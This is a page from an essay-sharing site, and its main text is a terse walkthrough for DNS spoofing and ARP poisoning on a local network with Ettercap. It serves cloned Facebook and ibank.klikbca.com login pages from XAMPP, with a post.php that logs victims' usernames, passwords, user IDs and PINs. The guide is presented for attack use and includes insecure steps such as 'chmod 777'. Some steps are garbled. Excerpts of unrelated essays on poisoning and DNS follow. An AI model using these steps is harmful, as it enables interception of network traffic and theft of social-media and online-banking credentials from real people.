Free Essay

Dns Spoofing and Arp Poisoning

In: Computers and Technology

Submitted By ariefk
Words 559
Pages 3
Edit file httpd.conf at /opt/lampp/etc
Remove # in front of:
LoadModule vhost_alias_module modules/mod_vhost_alias.so and Include conf/extra/httpd-vhosts.conf

Edit file httpd-xampp.conf at /opt/lampp/etc/extra
Add:
Allow from all
Allow from 192.168.1.0/16
Allow from 127.0.0.0/16
Allow from 10.0.0.0/16
Allow from 169.254.0.0/16
Require all granted

Edit file httpd-vhosts.conf at /opt/lampp/etc/extra
Add:
DocumentRoot “/opt/lampp/htdocs/”
ServerName localhost
,
Require all granted

accessed from other computer…..

Edit file etter.dns at /etc/ettercap
Change:
facebook.com A gmail.com A google.com A yahoo.com A

Sniff >>> Unified Sniffing

Host >>> Scan for Hosts
Hosts >>> Hosts List
192.168.1.1 >>> Add to Target 1

Plugins >>> Manage the plugins double-clicks dns_spoof

Mitm >>> ARP poisoning
Check >>> Sniff remote connection

Start >>> Start sniffing

Google.com >>> Hacked…!
Yahoo.com >>> Hacked…!
Facebook.com >>> Hacked…!
Gmail.com >>> Hacked…!

to save www.facebook.com as index.html file, then….. copy it to /opt/lampp/htdocs

to make post.php file to store username and password stolen from fake index.html file of www.facebook.com notice…..make blank file with name of logs.txt notice again…..make login.html as fake html of FAILED login

to change

with

to save FAILED login of facebook.com as login.html, then….. copy it to /opt/lampp/htdocs

to make all files in
/opt/lampp/htdocs to be able to execute by applying command
“chmod 777 *.*”

to edit etter.dns file at /etc/ettercap and to change : facebook.com A 192.168.1.110
*.facebook.com A 192.168.1.110 www.facebook.com PTR 192.168.1.110

to run Apache server with XAMPP, then….. to test it with localhost in browser

to test it from other computer, then….. to run : echo 1 > /proc/sys/net/ipv4/ip_forward

Sniff >>> Unified Sniffing

to run Ettercap for DNS Spoofing and ARP Poisoning

Host >>> Scan for Hosts
Hosts >>> Hosts List
192.168.1.1 >>> Add to Target 1

Plugins >>> Manage the plugins double-clicks dns_spoof

Mitm >>> ARP poisoning
Check >>> Sniff remote connection

Start >>> Start sniffing

to harvest username and password fromspoofed and poisoned www.facebook.com stored in logs.txt to save ibank.klikbca.com as index.html file, then….. copy it to /opt/lampp/htdocs

to find /authentication.do then replace it with post.php

to take a note: value(user_id) and value(pswd)

to save failed authentication page at ibank.klikbca.com as login.html file, then….. copy it to /opt/lampp/htdocs

to make a post.php file to remember to put: value(user_id) and value(pswd) and to make a blank logs.txt file

to make sure all files stored in
/opt/lampp/htdocs, then….. run chmod 777 *.* so all files can be read-write-execute to run Apache server and make sure everything runs well by checking it through localhost

Sniff >>> Unified Sniffing

to run Ettercap for DNS Spoofing and ARP Poisoning

Host >>> Scan for Hosts
Hosts >>> Hosts List
192.168.1.1 >>> Add to Target 1

Plugins >>> Manage the plugins double-clicks dns_spoof
Mitm >>> ARP poisoning
Check >>> Sniff remote connection

Start >>> Start sniffing

to access ibank.klikbca.com from other computer or target

to harvest user ID and PIN of targets while displaying failed authentication…...

Similar Documents

Free Essay

Dns Senario

...DNS scenario Dear junior IT, First off thank you for contacting my with your questions ill will try to help you to the best of my ability. So you are working at two branch offices and have been tasked with where to place Active-Directory Integrated DNS Servers and what type to use. Before I answer these questions I will ask you one myself. Do you know what an ADI DNS is and the different type of zones there are? If not I will enclose some details two my question. Secondly you say One of the branch offices is very small (maybe 5 users) and has very slow network connectivity. Do you need a DNS Server and, if so, which type of zone should it host? I would not recommend placing an ADI in your group because it isn’t big enough also it will slow the network down more than it already is. Finally you also said the second branch office is much larger (about 30 users) and has better network connectivity. Does this office need a DNS Server and, if so, what type of zone would I recommend? I would say yes you need a dns sever for this group and I would set it with the primary zone the DNS server is the primary source for information about this zone, and it stores the master copy of zone data in a local file or in AD DS. Thank you, IT administrator Active Directory–integrated DNS enables Active Directory storage and replication of DNS zone databases. Windows 2008 DNS server, the DNS server that is included with Windows 2008 Server, accommodates......

Words: 644 - Pages: 3

Free Essay

Paracetamol Poisoning

...SECTION 1. POISONING IN THE EMERGENCY SETTING Definition A poison is any substance which, when taken into the body in sufficient quantity, may either endanger life or seriously impair body functions (IHCD 1999). Introduction Poisons come in many forms and can enter the body in many ways: Inhalation – fumes, gases; Ingestion – liquids or solids by mouth; Injection – needles, animal and insect bites; Absorption – pesticides or herbicides through the skin and eyes. In the field of accident and emergency we see cases of poisoning that are both accidental and intentional. A massive 85% of these cases involve just three types of drug: Paracetamol 45% Benzodiazepines 20% Antidepressants 20% (Daly; Harrison, 2001). As the majority of our cases come from these non-corrosive types of poisons the author will concentrate only on overdoses of drugs, with the second section solely devoted to the most common of these; Paracetamol. Clinical Signs of Poisoning The majority of drugs effect the nervous system and produce some common signs: ▪ Slow, shallow respiration’s ▪ Lethargy and reduction in activity ▪ Vomiting and diarrhoea ▪ Loss of consciousness Some drugs though, such as Paracetamol are asymptomatic during the early stages of poisoning. Although in the majority of cases our treatment in the field for poisoning......

Words: 1128 - Pages: 5

Free Essay

Lead Poisoning

...Lead poisoning (also known as plumbism, colica Pictonum, saturnism, Devon colic[->0], or painter's colic) is a medical condition caused by increased levels of the heavy metal[->1] lead[->2] in the body. Lead interferes with a variety of body processes and is toxic to many organs and tissues including the heart[->3], bones[->4], intestines[->5], kidneys[->6], and nervous[->7] systems.Symptoms include abdominal pain, confusion[->8], headache, anemia[->9], irritability, and in severe cases seizures[->10], coma[->11], and death[->12]. Routes of exposure to lead include contaminated air, water, soil, food, and consumer Occupational exposure is a common cause of lead poisoning in adults Classically, "lead poisoning" or "lead intoxication" has been defined as exposure to high levels of lead typically associated with severe health effectsLead is a common environmental pollutant.[11] Causes of environmental contamination include industrial use of lead, such as is found in facilities that process lead-acid batteries or produce lead wire or pipes, and metal recycling and foundries.[32] Children living near facilities that process lead, such as smelters, have been found to have unusually high blood lead levels.[33] In August 2009, parents rioted in China after lead poisoning was found in nearly 2000 children[->13] living near zinc and manganese smelters.[34] Lead exposure can occur from contact with lead in air, household dust, soil, water, and commercial products.[9] People can be...

Words: 814 - Pages: 4

Premium Essay

Dns and Dhcp

...Assignment 1 DNS and DHCP can make a system administrator's life simpler and easier. Fortunately, the protocols are so flexible that they can be implemented either together or separately depending on the size and configuration of your enterprise network. So whether you have 5 or 5000 computers in your network this would be justifiable action because of the following reasons: Looking up IP addresses can be a nightmare if you have more than a couple to remember If you have network-enabled printers, unless you lock the address, it will change every time you disconnect the printer from the network. This can be extremely frustrating for the users. If you have more than a small number of machines, then you should be looking at implementing DNS in addition to DCHP. There are a number of ways to implement DNS in-house depending on the specifics of the company computer systems architecture. The choice depends on the available skills in your shop and the network configuration. One nice thing about implementing DNS is that once it is set up, it pretty much runs without much need for human intervention. That means that if you hire a consultant to do the initial configuration, you only need to maintain the service with a minimum of skills and resources. I found two choices for configuring the service using Microsoft Active Directory or (the newest possibility) purchasing a DNS/DHCP service appliance. Whatever implementation you choose, once it is configured, the best DNS/DHCP server......

Words: 274 - Pages: 2

Free Essay

Dns Internet

...McCormick School of Engineering and Applied Science, and his team found that one cause of slow web performance is a growing trend toward public Domain Name Systems (DNS), a form of database that translates Internet domain and host names into Internet Protocol (IP) addresses. DNS services play a vital role in the Internet: every time a user visits a website, chats with friends, or sends email, his computer performs DNS look-ups before setting up a connection. Complex web pages often require multiple DNS look-ups before they start loading, so users' computers may perform hundreds of DNS look-ups a day. Most users are unaware of DNS, since Internet Service Providers (ISP) typically offer the service transparently. Over the last few years, companies such as Google, OpenDNS, and Norton DNS have begun offering "public" DNS services. While "private" DNS services, such as those offered by ISPs, may be misconfigured, respond slowly to queries, and go down more often, public DNS services offer increased security and privacy, and quicker resolution time. The arrangement is also beneficial for public DNS providers, who gain access to information about users' web habits. Bustamante and his team found that while using public DNS services may provide many benefits, users' web performance can suffer due to the hidden interaction of DNS with Content Delivery Networks (CDNs), another useful and equally transparent service in the web. CDNs help performance by offering exact replicas of......

Words: 490 - Pages: 2

Free Essay

Poisoning

...What is POISONING ? http://www.youtube.com/watch?v=4SQJky9yMK4 Poisoning is caused by swallowing, injecting, breathing in, or otherwise being exposed to a harmful substance. Most poisonings occur by accident. Immediate first aid is very important in a poisoning emergency. The first aid you give before getting medical help can save a person's life. This is for information only and not for use in the treatment or management of an actual poison exposure. Causes * Items that can cause poisoning include: * Carbon monoxide gas (from furnaces, gas engines, fires, space heaters) * Certain foods * Chemicals in the workplace * Drugs, including over-the-counter and prescription medicines (such as an aspirin overdose) and illicit drugs such as cocaine * Household detergents and cleaning products * Household and outdoor plants (eating toxic plants) * Insecticides * Paints Signs and symptoms of poisoning Common signs and symptoms to look for include: * Burns or redness around the mouth and lips, from drinking certain poisons * Breath that smells like chemicals, such as gasoline or paint thinner * Burns, stains and odors on the person, on clothing, or on furniture, floor, rugs or other objects in the surrounding area * Empty medication bottles or scattered pills * Vomiting, difficulty breathing, sleepiness, confusion or other unexpected signs FIRST AID * When the Poison Was Swallowed 1. Call emergency services or...

Words: 1252 - Pages: 6

Free Essay

Alcohol Poisoning

...accumulate in the air to dangerous concentrations if adequate ventilation has not been provided. Mixtures Moonshine has sometimes been mixed with an adulterant (e.g. methanol, lye) with the intent of increasing its apparent alcohol content. This practice has sometimes resulted in a toxic mixture that can cause blindness or death. Although poisoning incidents are rare, particularly in developed nations, they are a cause for concern about the safety of moonshine. Moonshine may be flavored with fruit or bark. The mash may be cooked with birch bark to achieve a mint-like flavor. Fruit flavoring may be added to the product before bottling. Spurious liquor or moonshine contains a good amount of methanol or methyle alcohol. Methanol or Methyl Alcohol is a denaturant. It is a component of varnishes, paint removers, windshield wipers, anti-freeze solutions, copy-machine fluid and as a solvent. Acute Poisoning Acute Methanol Poisoning ( spurious liquor) is usually a consequence of ingestion of cheap, adulterated, illicit liquor. Methanol is very toxic and requires as little as 30 ml of 40% solution to be fatal. Poisoning is mostly stratified among the people of lower socioeconomic status. On ingestion, Methanol is metabolized in the liver to formaldehyde and formic acid by alcohol dehydrogenase. Although both are toxic, formic acid is what causes the more serious delayed effects. It is also readily distributed in the liver, gastrointestinal tract, eyes and......

Words: 796 - Pages: 4

Free Essay

Mercury Poisoning

...Mercury Poisoning 'In that direction,' the Cat said, 'lives a hatter: and in That direction, lives a March Hare. Visit either you like: they're both mad.' (Lewis Carroll, 1865) With those lines the Cheshire Cat in Lewis Carroll’s Alice’s Adventures in Wonderland introduces us to a victim of mercury poisoning. The term mad as a hatter was very common in Carroll’s day because of the use of mercury in the making of hats. Once it was understood that mercury was highly toxic, it was no longer used in the making of hats. The damage had already been done. Hatters would suffer from “hatter’s shakes”, a form of nerve damage with symptoms not unlike Parkinson’s disease. Even today it is still called “Mad Hatters Syndrome”. (Martin, 2012) Hats are now formed and blocked using hot water and steam. (Rand's Custom Hats, 2012) Mercury contamination is still a real threat even though hatters no longer use the metal. The first recorded account of mercury poisoning was in 50 B.C. Today, scientist recognize mercury to be a neurotoxin and that high levels of exposure can lead to serious illness and even death. Since the 1950’s and 60’s, scientific evidence has pointed to mercury or anthropogenic emissions as having widespread impacts on the environment and human health. For instance, in 1956 methylmercury poisoning was officially discovered in a Japanese community near a polyvinyl chloride plastics plant that has been dumping untreated liquid waste containing......

Words: 731 - Pages: 3

Premium Essay

Ip Spoofing

...12/7/2014 IP Spoofing ­ Cisco Systems The Internet Protocol Journal, Volume 10, No. 4 IP Spoofing HOME ABOUT CISCO PUBLICATIONS AND MERCHANDISE THE INTERNET PROTOCOL JOURNAL ISSUES VOLUME 10, NUMBER 4, DECEMBER 2007 Book Review Call for Papers Download PDF Fragments From the Editor IP Spoofing Looking Toward the Future Remembering Itojun Security Standards Layers above IP use the source address in an incoming packet to identify the sender. To communicate with the sender, the receiving station sends a reply by using the source address in the datagram. Because IP makes no effort to validate whether the source address in the packet generated by a node is actually the source address of the node, you can spoof the source address and the receiver will think the packet is coming from that spoofed address. Many programs for preparing spoofed IP datagrams are available for free on the Internet; for example, hping lets you prepare spoofed IP datagrams with just a one­line command, and you can send them to almost anybody in the world. You can spoof at various network layers; for example, you can use Address Resolution Protocol (ARP) spoofing to divert the traffic intended for one station to someone else. The Simple Mail Transfer Protocol (SMTP) is also a target for spoofing; because SMTP does not verify the sender's address, you can send any e­mail to anybody pretending to be someone else. This article focuses on the various types of attacks that involve......

Words: 3181 - Pages: 13

Free Essay

Lead Poisoning

...Importance of Lead Poisoning * It can cause serious harmful problems effects on the body including: hearing, anemia, peripheral neuropathies, wrist/foot drop, encephalopathy, seizures, coma, and even death. It can also cause children to have lower IQ scores and behavioral issues. * Lead stays within the body for decades, stored within the bones of the human body. * In pregnant women, lead can cross the placental barrier and cause harm to the fetus such as reduced growth and prematurity. Importance of Lead Poisoning * It can cause serious harmful problems effects on the body including: hearing, anemia, peripheral neuropathies, wrist/foot drop, encephalopathy, seizures, coma, and even death. It can also cause children to have lower IQ scores and behavioral issues. * Lead stays within the body for decades, stored within the bones of the human body. * In pregnant women, lead can cross the placental barrier and cause harm to the fetus such as reduced growth and prematurity. Lead Poisoning in Infants Lead Poisoning in Infants Resources Available * Lead-Based Paint Hazard Control Program (Tucson)-Serves low-income families with children under 6 years old. 310 N. Commerce Park Loop, Tucson, AZ 85745 520-791-4171 * Childhood Lead Poisoning Prevention Program-Focuses on food, candies, Mexican folk remedies, and ceramics 150 N. 18th Ave., Ste. 130, Phoenix, Az 85007 602-364-3118 * National Resource * Web-Based......

Words: 947 - Pages: 4

Free Essay

Lead Poisoning

...Question 1: Lead and lead poisoning Lead is a natural metal found in the earth. Lead poisoning can occur if exposure to high levels of lead happens within a short period of time. Lead enters the body via: •Water: About 20% of lead exposure comes through water because water runs through lead pipes connected to our taps. • Air that has been contaminated • Food It enters canned food which were sealed with lead solder. •Soil: lead dust that might have settled on soil and then eaten. Lead poisoning affects more kids than adults. The largest threat to children is lead paint. Whether lead is breathed in or swallowed in, it still causes the same health problems. Problems related to overexposure of lead are, amongst others: • Constant headaches • Pains in the abdomen • Being tired all the time •Constipation • Fatigue •Forgetfulness In extreme cases, lead poisoning can lead to: •brain damage •kidney failure •cancer •seizures Very high levels of lead exposure can also be fatal. Lead is toxic to the nervous system, bones and heart. The symptoms of lead poisoning in children doesnot always show if the child has lead poisoning. It is important for educators to try and prevent lead exposure to children of all ages by putting certain measures in place. For example: •Educate learners of safe drinking habits, eg. Not to drink water from the bathroom taps, to let the tap run a little bit before drinking water, Encourage the drinking of bottled water • Ensure that equipment is well......

Words: 289 - Pages: 2

Premium Essay

Email Tracing and Spoofing

...EMAIL TRACING AND SPOOFING Abstract : E-mail spoofing is the forgery of an e-mail header so that the message appears to have originated from someone or somewhere other than the actual source. Distributors of spam often use spoofing in an attempt to get recipients to open, and possibly even respond to, their solicitations. Spoofing can be used legitimately. Classic examples of senders who might prefer to disguise the source of the e-mail include a sender reporting mistreatment by a spouse to a welfare agency or a "whistle-blower" who fears retaliation. However, spoofing anyone other than yourself is illegal in some jurisdictions. In this report we will study some ways of email spoofing as well as ways of tracing the spoofed email back. 1. INTRODUCTION Spoofing refers to the act of using imitation to make parody of another work of media or entertainment. Similarly, in the digital world too, the word spoofing is used to highlight the act of tricking and fooling the unaware netizens through utterly believable imitations of trusted service providers. Spoofing is basically of 4 types: 1) URL spoofing 2) Referral spoofing 3) Caller ID spoofing 4) E-mail address spoofing In this report we will be dealing with only email address spoofing.This will include a detailed study of the techniques used in spoofing and the techniques used to trace the spammers indulging in the malicious act of email spoofing. 2. EMAIL SPOOFING Email spoofing is the act of sending an email......

Words: 3362 - Pages: 14

Free Essay

Lead Poisoning

... * Lead is harmful to child’s brain. It affects child’s behavior, development, ability to learn. Little kids are at higher risk for lead poisoning because they like to chew on objects and to put everything in the mouth. * Just a few particles of dust from lead-based paint are enough to poison a child (LeadFreeKids.org 2015) Why is it important? * Lead is harmful to child’s brain. It affects child’s behavior, development, ability to learn. Little kids are at higher risk for lead poisoning because they like to chew on objects and to put everything in the mouth. * Just a few particles of dust from lead-based paint are enough to poison a child (LeadFreeKids.org 2015) LEAD POISONING LEAD POISONING References: McKinney, E. (2005). Maternal-child nursing. St. Louis, Mo.: Elsevier Saunders. California Department of Public Health,. (2007). Simple Steps to protect your Child from Lead. Retrieved 13 December 2015, from http://www.cdph.ca.gov/programs/CLPPB/Documents/CLPPB-SimpleSteps(E).pdf Leadfreekids.org,. (2015). Leadfreekids.org. Retrieved 13 December 2015, from http://www.leadfreekids.org/ Vivier, P. M., Hauptman, M., Weitzen, S. H., Bell, S., Quilliam, D. N., & Logan, J. R. (2011). The important health impact of where a child lives: Neighborhood characteristics and the burden of lead poisoning. Maternal And Child Health Journal, 15(8), 1195-1202. doi:10.1007/s10995-010-0692-6 Dewalt, F. G., Cox, D. C., O'Haver, R., Salatino, B.,......

Words: 1165 - Pages: 5

Free Essay

Ip Spoofing

...IP Spoofing: An Introduction Criminals have long employed the tactic of masking their true identity, from disguises to aliases to caller-id blocking. It should come as no surprise then, that criminals who conduct their nefarious activities on networks and computers should employ such techniques. IP spoofing is one of the most common forms of on-line camouflage. In IP spoofing, an attacker gains unauthorized access to a computer or a network by making it appear that a malicious message has come from a trusted machine by “spoofing” the IP address of that machine. In this article, we will examine the concepts of IP spoofing: why it is possible, how it works, what it is used for and how to defend against it.Internet Protocol – IP Internet protocol (IP) is a network protocol operating at layer 3 (network) of the OSI model. It is a connectionless model, meaning there is no information regarding transaction state, which is used to route packets on a network. Additionally, there is no method in place to ensure that a packet is properly delivered to the destination.Examining the IP header, we can see that the first 12 bytes (or the top 3 rows of the header) contain various information about the packet. The next 8 bytes (the next 2 rows), however, contains the source and destination IP addresses. Using one of several tools, an attacker can easily modify these addresses – specifically the “source address” field. It's important to note that each datagram is sent independent of all......

Words: 1398 - Pages: 6

Premium Essay

Dns Server

...“Birch” DNS Server The Mail server will be using fedora as the OS. First step will be to install fedora on the server. After successful install there are 3 packages that need to be installed. The first package will be the bind package. Next will be the bind-utils and bind-chroot packages. After successful install of all packages we will start with adding files to the chroot directory that will be implemented for security. We will do this in anticipation if anyone hacks into the server they will be confined to that directory. To do this a copy of the named.config, named.rfc1912.zones, and the named.root.hints files will made in the /var/named/chroot/etc directory.Also copy the default zone files from/user/share/doc/bind/sample/var/named into var/named/chroot/var/named directory. In the /etc/named.config file we need to add the DNS server Birch.company.com with the ip address 206.207.208.12, mail server Cedar.company.com 206.207.208.11, and web server Aspen.company.com 206.207.208.10 to the list of servers to be added to the DMZ zone.. In the /etc/resolve.config file we need to point the DNS server to quiry the ISP DNS 82.83.84.85 for unknown names or domains. This setup will allow clients on the Corp. side to query the DMZ DNS which will in turn query the ISP DNS for any name resolution and protect the internal network from being compromised. In addition to the using chroot we will also implement SELinux as addition security. To ensure DNS will run automatically at system......

Words: 295 - Pages: 2